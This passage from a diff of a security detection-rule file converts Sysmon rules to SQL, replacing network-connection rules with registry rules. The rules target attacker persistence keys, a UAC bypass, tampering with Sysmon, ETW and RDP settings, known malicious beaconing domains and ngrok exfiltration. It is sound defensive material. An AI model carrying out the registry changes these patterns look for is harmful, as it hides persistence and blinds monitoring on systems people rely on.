'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_reddit_api_non_browser_access.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "status": "experimental", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Web Browsers" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "PowerShell Network Connections", - "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "status": "experimental", - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", - "author": "Florian Roth (Nextron Systems)", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "status": "test", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft IP range" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_powershell_network_connection.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "status": "test", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR 